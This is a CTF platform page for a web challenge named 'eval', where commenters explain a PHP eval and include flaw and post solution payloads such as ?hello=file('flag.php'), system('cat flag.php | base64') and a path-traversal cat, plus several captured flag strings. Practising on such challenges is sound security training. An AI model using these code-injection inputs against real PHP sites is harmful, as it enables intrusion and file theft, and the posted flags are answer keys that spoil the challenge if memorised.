evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 20348
提  示:
描  述:
eval
评论
ryan777 3年前

根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')

回复 3

AmazingForself 3年前

看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539

回复 0

ryl123569 3年前

?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}

回复 0

xiaobaiermei 3年前

这里应该算的上是个文件包含吧

回复 0

17leaf 3年前

flag{4ccf17345bf8d8b3c5a6d005cf17e00a}

回复 0

cap 3年前

为啥我这样不行 ?hello=system("cat flag.php")

回复 0
Restwlaq 3年前

因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')

回复 0

你的宝 3年前

http://114.67.175.224:15626/?hello=file(%27flag.php%27)

回复 0

15056775319 3年前

http://114.67.175.224:17077/?hello=system('cat../../../../../../../../flag')

回复 0

dodobird 3年前

flag{6138fe804a171cd4cbfc9ea7cf1d1cd4}

回复 0

bigbox1 3年前

`cat *` 或system("cat *")

回复 0

WriteUp

image
harry

1 金币

评分(13)

解题动态

小白修炼日常 攻破了该题 1小时前
tafeishi 攻破了该题 2小时前
diandianying 攻破了该题 21小时前
amuliang1 攻破了该题 23小时前
恣睢 攻破了该题 1天前
xiaoqixy1 攻破了该题 1天前
lonely_wolf 攻破了该题 1天前
soymilk 攻破了该题 1天前
gedeer 攻破了该题 2天前
ysjy 攻破了该题 2天前
cholmon 攻破了该题 2天前
ling_x 攻破了该题 2天前
Anos 攻破了该题 3天前
15369226763 攻破了该题 3天前
人生1234 攻破了该题 3天前
asasehotaru 攻破了该题 3天前
wwwwander 攻破了该题 4天前
re_void 攻破了该题 4天前
wefyh 攻破了该题 4天前
16533261 攻破了该题 4天前
问题反馈